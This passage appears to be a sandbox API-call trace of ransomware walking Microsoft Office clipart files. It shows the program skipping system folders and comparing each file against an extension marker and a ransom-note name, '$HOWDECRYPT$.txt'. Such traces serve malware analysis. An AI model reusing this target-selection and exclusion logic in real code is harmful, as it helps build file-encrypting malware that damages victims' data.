RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3506e8 [0097.064] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1828) returned 0x2c310e0 [0097.064] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.064] lstrcmpiW (lpString1="BL00148_.WMF", lpString2="Windows") returned -1 [0097.065] lstrlenW (lpString="Windows") returned 7 [0097.065] lstrcmpiW (lpString1="BL00148_.WMF", lpString2="$Recycle.bin") returned 1 [0097.065] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.065] lstrcmpiW (lpString1="BL00148_.WMF", lpString2="System Volume Information") returned -1 [0097.065] lstrlenW (lpString="System Volume Information") returned 25 [0097.065] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 67 [0097.065] StrStrIW (lpFirst="BL00148_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.065] lstrcmpW (lpString1="BL00148_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.065] lstrcmpW (lpString1="BL00148_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.065] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 67 [0097.065] GetProcessHeap () returned 0x2c0000 [0097.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3507b8 [0097.065] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1830) returned 0x2c310e0 [0097.065] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.065] lstrcmpiW (lpString1="BL00152_.WMF", lpString2="Windows") returned -1 [0097.065] lstrlenW (lpString="Windows") returned 7 [0097.065] lstrcmpiW (lpString1="BL00152_.WMF", lpString2="$Recycle.bin") returned 1 [0097.065] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.065] lstrcmpiW (lpString1="BL00152_.WMF", lpString2="System Volume Information") returned -1 [0097.065] lstrlenW (lpString="System Volume Information") returned 25 [0097.065] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 67 [0097.065] StrStrIW (lpFirst="BL00152_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.066] lstrcmpW (lpString1="BL00152_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.066] lstrcmpW (lpString1="BL00152_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 67 [0097.066] GetProcessHeap () returned 0x2c0000 [0097.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10060 [0097.066] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1838) returned 0x2c310e0 [0097.066] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.066] lstrcmpiW (lpString1="BL00194_.WMF", lpString2="Windows") returned -1 [0097.066] lstrlenW (lpString="Windows") returned 7 [0097.066] lstrcmpiW (lpString1="BL00194_.WMF", lpString2="$Recycle.bin") returned 1 [0097.066] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.066] lstrcmpiW (lpString1="BL00194_.WMF", lpString2="System Volume Information") returned -1 [0097.066] lstrlenW (lpString="System Volume Information") returned 25 [0097.066] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 67 [0097.066] StrStrIW (lpFirst="BL00194_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.066] lstrcmpW (lpString1="BL00194_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.066] lstrcmpW (lpString1="BL00194_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 67 [0097.066] GetProcessHeap () returned 0x2c0000 [0097.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10130 [0097.066] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1840) returned 0x2c310e0 [0097.066] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.067] lstrcmpiW (lpString1="BL00195_.WMF", lpString2="Windows") returned -1 [0097.067] lstrlenW (lpString="Windows") returned 7 [0097.067] lstrcmpiW (lpString1="BL00195_.WMF", lpString2="$Recycle.bin") returned 1 [0097.067] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.067] lstrcmpiW (lpString1="BL00195_.WMF", lpString2="System Volume Information") returned -1 [0097.067] lstrlenW (lpString="System Volume Information") returned 25 [0097.067] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 67 [0097.067] StrStrIW (lpFirst="BL00195_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.067] lstrcmpW (lpString1="BL00195_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.067] lstrcmpW (lpString1="BL00195_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.067] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 67 [0097.067] GetProcessHeap () returned 0x2c0000 [0097.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10200 [0097.067] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1848) returned 0x2c310e0 [0097.067] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.067] lstrcmpiW (lpString1="BL00234_.WMF", lpString2="Windows") returned -1 [0097.067] lstrlenW (lpString="Windows") returned 7 [0097.067] lstrcmpiW (lpString1="BL00234_.WMF", lpString2="$Recycle.bin") returned 1 [0097.067] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.067] lstrcmpiW (lpString1="BL00234_.WMF", lpString2="System Volume Information") returned -1 [0097.067] lstrlenW (lpString="System Volume Information") returned 25 [0097.067] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 67 [0097.067] StrStrIW (lpFirst="BL00234_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.068] lstrcmpW (lpString1="BL00234_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.068] lstrcmpW (lpString1="BL00234_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.068] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 67 [0097.068] GetProcessHeap () returned 0x2c0000 [0097.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c102d0 [0097.068] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1850) returned 0x2c310e0 [0097.068] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.068] lstrcmpiW (lpString1="BL00242_.WMF", lpString2="Windows") returned -1 [0097.068] lstrlenW (lpString="Windows") returned 7 [0097.068] lstrcmpiW (lpString1="BL00242_.WMF", lpString2="$Recycle.bin") returned 1 [0097.068] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.068] lstrcmpiW (lpString1="BL00242_.WMF", lpString2="System Volume Information") returned -1 [0097.068] lstrlenW (lpString="System Volume Information") returned 25 [0097.068] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 67 [0097.068] StrStrIW (lpFirst="BL00242_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.068] lstrcmpW (lpString1="BL00242_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.068] lstrcmpW (lpString1="BL00242_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.068] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 67 [0097.068] GetProcessHeap () returned 0x2c0000 [0097.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c103a0 [0097.068] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1858) returned 0x2c310e0 [0097.069] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.069] lstrcmpiW (lpString1="BL00247_.WMF", lpString2="Windows") returned -1 [0097.069] lstrlenW (lpString="Windows") returned 7 [0097.069] lstrcmpiW (lpString1="BL00247_.WMF", lpString2="$Recycle.bin") returned 1 [0097.069] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.069] lstrcmpiW (lpString1="BL00247_.WMF", lpString2="System Volume Information") returned -1 [0097.069] lstrlenW (lpString="System Volume Information") returned 25 [0097.069] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 67 [0097.069] StrStrIW (lpFirst="BL00247_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.069] lstrcmpW (lpString1="BL00247_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.069] lstrcmpW (lpString1="BL00247_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.069] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 67 [0097.069] GetProcessHeap () returned 0x2c0000 [0097.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10470 [0097.069] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1860) returned 0x2c310e0 [0097.069] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.069] lstrcmpiW (lpString1="BL00248_.WMF", lpString2="Windows") returned -1 [0097.069] lstrlenW (lpString="Windows") returned 7 [0097.069] lstrcmpiW (lpString1="BL00248_.WMF", lpString2="$Recycle.bin") returned 1 [0097.069] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.069] lstrcmpiW (lpString1="BL00248_.WMF", lpString2="System Volume Information") returned -1 [0097.069] lstrlenW (lpString="System Volume Information") returned 25 [0097.069] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 67 [0097.070] StrStrIW (lpFirst="BL00248_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.070] lstrcmpW (lpString1="BL00248_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.070] lstrcmpW (lpString1="BL00248_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.070] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 67 [0097.070] GetProcessHeap () returned 0x2c0000 [0097.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10540 [0097.070] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1868) returned 0x2c310e0 [0097.070] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.070] lstrcmpiW (lpString1="BL00252_.WMF", lpString2="Windows") returned -1 [0097.070] lstrlenW (lpString="Windows") returned 7 [0097.070] lstrcmpiW (lpString1="BL00252_.WMF", lpString2="$Recycle.bin") returned 1 [0097.070] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.070] lstrcmpiW (lpString1="BL00252_.WMF", lpString2="System Volume Information") returned -1 [0097.070] lstrlenW (lpString="System Volume Information") returned 25 [0097.070] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 67 [0097.070] StrStrIW (lpFirst="BL00252_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.070] lstrcmpW (lpString1="BL00252_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.070] lstrcmpW (lpString1="BL00252_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.070] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 67 [0097.070] GetProcessHeap () returned 0x2c0000 [0097.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10610 [0097.070] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1870) returned 0x2c310e0 [0097.071] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.071] lstrcmpiW (lpString1="BL00254_.WMF", lpString2="Windows") returned -1 [0097.071] lstrlenW (lpString="Windows") returned 7 [0097.071] lstrcmpiW (lpString1="BL00254_.WMF", lpString2="$Recycle.bin") returned 1 [0097.071] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.071] lstrcmpiW (lpString1="BL00254_.WMF", lpString2="System Volume Information") returned -1 [0097.071] lstrlenW (lpString="System Volume Information") returned 25 [0097.071] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 67 [0097.071] StrStrIW (lpFirst="BL00254_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.071] lstrcmpW (lpString1="BL00254_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.071] lstrcmpW (lpString1="BL00254_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.071] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 67 [0097.071] GetProcessHeap () returned 0x2c0000 [0097.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c106e0 [0097.071] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1878) returned 0x2c310e0 [0097.071] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.071] lstrcmpiW (lpString1="BL00261_.WMF", lpString2="Windows") returned -1 [0097.071] lstrlenW (lpString="Windows") returned 7 [0097.071] lstrcmpiW (lpString1="BL00261_.WMF", lpString2="$Recycle.bin") returned 1 [0097.071] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.071] lstrcmpiW (lpString1="BL00261_.WMF", lpString2="System Volume Information") returned -1 [0097.071] lstrlenW (lpString="System Volume Information") returned 25 [0097.072] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 67 [0097.072] StrStrIW (lpFirst="BL00261_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.072] lstrcmpW (lpString1="BL00261_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.072] lstrcmpW (lpString1="BL00261_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.072] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 67 [0097.072] GetProcessHeap () returned 0x2c0000 [0097.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c107b0 [0097.072] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1880) returned 0x2c310e0 [0097.072] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.072] lstrcmpiW (lpString1="BL00262_.WMF", lpString2="Windows") returned -1 [0097.072] lstrlenW (lpString="Windows") returned 7 [0097.072] lstrcmpiW (lpString1="BL00262_.WMF", lpString2="$Recycle.bin") returned 1 [0097.072] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.072] lstrcmpiW (lpString1="BL00262_.WMF", lpString2="System Volume Information") returned -1 [0097.072] lstrlenW (lpString="System Volume Information") returned 25 [0097.072] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 67 [0097.072] StrStrIW (lpFirst="BL00262_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.072] lstrcmpW (lpString1="BL00262_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.072] lstrcmpW (lpString1="BL00262_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.072] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 67 [0097.072] GetProcessHeap () returned 0x2c0000 [0097.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10880 [0097.073] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1888) returned 0x2c310e0 [0097.073] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.073] lstrcmpiW (lpString1="BL00265_.WMF", lpString2="Windows") returned -1 [0097.073] lstrlenW (lpString="Windows") returned 7 [0097.073] lstrcmpiW (lpString1="BL00265_.WMF", lpString2="$Recycle.bin") returned 1 [0097.073] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.073] lstrcmpiW (lpString1="BL00265_.WMF", lpString2="System Volume Information") returned -1 [0097.073] lstrlenW (lpString="System Volume Information") returned 25 [0097.073] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 67 [0097.073] StrStrIW (lpFirst="BL00265_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.073] lstrcmpW (lpString1="BL00265_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.073] lstrcmpW (lpString1="BL00265_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.073] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 67 [0097.073] GetProcessHeap () returned 0x2c0000 [0097.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10950 [0097.073] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1890) returned 0x2c310e0 [0097.073] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.073] lstrcmpiW (lpString1="BL00267_.WMF", lpString2="Windows") returned -1 [0097.073] lstrlenW (lpString="Windows") returned 7 [0097.073] lstrcmpiW (lpString1="BL00267_.WMF", lpString2="$Recycle.bin") returned 1 [0097.073] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.073] lstrcmpiW (lpString1="BL00267_.WMF", lpString2="System Volume Information") returned -1 [0097.074] lstrlenW (lpString="System Volume Information") returned 25 [0097.074] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 67 [0097.074] StrStrIW (lpFirst="BL00267_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.074] lstrcmpW (lpString1="BL00267_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.074] lstrcmpW (lpString1="BL00267_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.074] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 67 [0097.074] GetProcessHeap () returned 0x2c0000 [0097.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10a20 [0097.074] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1898) returned 0x2c310e0 [0097.074] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.074] lstrcmpiW (lpString1="BL00269_.WMF", lpString2="Windows") returned -1 [0097.074] lstrlenW (lpString="Windows") returned 7 [0097.074] lstrcmpiW (lpString1="BL00269_.WMF", lpString2="$Recycle.bin") returned 1 [0097.074] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.074] lstrcmpiW (lpString1="BL00269_.WMF", lpString2="System Volume Information") returned -1 [0097.074] lstrlenW (lpString="System Volume Information") returned 25 [0097.074] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 67 [0097.074] StrStrIW (lpFirst="BL00269_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.074] lstrcmpW (lpString1="BL00269_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.074] lstrcmpW (lpString1="BL00269_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.074] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 67 [0097.074] GetProcessHeap () returned 0x2c0000 [0097.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10af0 [0097.075] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x18a0) returned 0x2c310e0 [0097.075] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.075] lstrcmpiW (lpString1="BL00270_.WMF", lpString2="Windows") returned -1 [0097.075] lstrlenW (lpString="Windows") returned 7 [0097.075] lstrcmpiW (lpString1="BL00270_.WMF", lpString2="$Recycle.bin") returned 1 [0097.075] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.075] lstrcmpiW (lpString1="BL00270_.WMF", lpString2="System Volume Information") returned -1 [0097.075] lstrlenW (lpString="System Volume Information") returned 25 [0097.075] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 67 [0097.075] StrStrIW (lpFirst="BL00270_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.075] lstrcmpW (lpString1="BL00270_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.075] lstrcmpW (lpString1="BL00270_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.075] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 67 [0097.075] GetProcessHeap () returned 0x2c0000 [0097.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10bc0 [0097.075] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x18a8) returned 0x2c310e0 [0097.075] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.075] lstrcmpiW (lpString1="BL00273_.WMF", lpString2="Windows") returned -1 [0097.075] lstrlenW (lpString="Windows") returned 7 [0097.075] lstrcmpiW (lpString1="BL00273_.WMF", lpString2="$Recycle.bin") returned 1 [0097.075] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.075] lstrcmpiW (lpString1="BL00273_.WMF", lpString2="System Volume Information") returned -1 [0097.075] lstrlenW (lpString="System Volume Information") returned 25 [0097.076] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 67 [0097.076] StrStrIW (lpFirst="BL00273_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.076] lstrcmpW (lpString1="BL00273_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.076] lstrcmpW (lpString1="BL00273_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 67 [0097.081] GetProcessHeap () returned 0x2c0000 [0097.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10c90 [0097.081] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x18b0) returned 0x2c310e0 [0097.081] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.081] lstrcmpiW (lpString1="BL00274_.WMF", lpString2="Windows") returned -1 [0097.081] lstrlenW (lpString="Windows") returned 7 [0097.081] lstrcmpiW (lpString1="BL00274_.WMF", lpString2="$Recycle.bin") returned 1 [0097.081] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.081] lstrcmpiW (lpString1="BL00274_.WMF", lpString2="System Volume Information") returned -1 [0097.081] lstrlenW (lpString="System Volume Information") returned 25 [0097.081] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 67 [0097.081] StrStrIW (lpFirst="BL00274_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.081] lstrcmpW (lpString1="BL00274_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.081] lstrcmpW (lpString1="BL00274_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.081] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 67 [0097.081] GetProcessHeap () returned 0x2c0000 [0097.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10d60 [0097.081] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x18b8) returned 0x2c310e0 [0097.081] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.081] lstrcmpiW (lpString1="BL00296_.WMF", lpString2="Windows") returned -1 [0097.082] lstrlenW (lpString="Windows") returned 7 [0097.082] lstrcmpiW (lpString1="BL00296_.WMF", lpString2="$Recycle.bin") returned 1 [0097.082] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.082] lstrcmpiW (lpString1="BL00296_.WMF", lpString2="System Volume Information") returned -1 [0097.082] lstrlenW (lpString="System Volume Information") returned 25 [0097.082] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 67 [0097.082] StrStrIW (lpFirst="BL00296_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.082] lstrcmpW (lpString1="BL00296_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.082] lstrcmpW (lpString1="BL00296_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.082] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 67 [0097.082] GetProcessHeap () returned 0x2c0000 [0097.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10e30 [0097.082] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x18c0) returned 0x2c310e0 [0097.082] FindNextFileW (in: 